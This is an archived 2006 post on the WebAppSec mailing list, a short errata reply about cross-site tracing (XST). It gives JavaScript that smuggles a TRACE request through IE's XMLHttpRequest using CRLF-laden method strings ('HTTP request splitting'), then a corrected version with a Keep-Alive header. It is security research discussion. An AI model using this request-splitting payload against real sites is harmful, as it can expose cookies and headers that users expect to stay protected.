Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

webappsec logo WebApp Sec mailing list archives

ERRATA: Re: [WEB SECURITY] XST
From: "Amit Klein (AKsecurity)" <aksecurity () hotpop com>
Date: Tue, 21 Mar 2006 16:25:20 +0200

Well, you can try the technique I dubbed "HTTP Request splitting", see
"Exploiting the XmlHttpRequest object in IE - Referrer spoofing, and a lot more..." by 
yours truly, 
http://www.webappsec.org/lists/websecurity/archive/2005-09/msg00019.html

Try something like this:

  var x = new ActiveXObject("Microsoft.XMLHTTP");

  x.open("GET\t/\tHTTP/1.0\r\nHost:\twww.target.site\r\n\r\nTRACE\t/\tHTTP/1.0\r\nFoobar:",
      "/",false);



I should've taken care of the connection persistence...

Please use (note the addition of the "Connection: Keep-Alive" header):

   x.open("GET\t/\tHTTP/1.0\r\nHost:\twww.target.site\r\nConnection:\t
        Keep-   Alive\r\n\r\nTRACE\t/\tHTTP/1.0\r\nFoobar:","/",false);



  x.send();



 [...]

-Amit

-------------------------------------------------------------------------
This List Sponsored by: SpiDynamics

ALERT: "How A Hacker Launches A Web Application Attack!" 
Step-by-Step - SPI Dynamics White Paper
Learn how to defend against Web Application Attacks with real-world 
examples of recent hacking methods such as: SQL Injection, Cross Site 
Scripting and Parameter Manipulation

https://download.spidynamics.com/1/ad/web.asp?Campaign_ID=701300000003gRl
--------------------------------------------------------------------------

  By Date           By Thread  

Current thread:
  • ERRATA: Re: [WEB SECURITY] XST Amit Klein (AKsecurity) (Mar 21)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]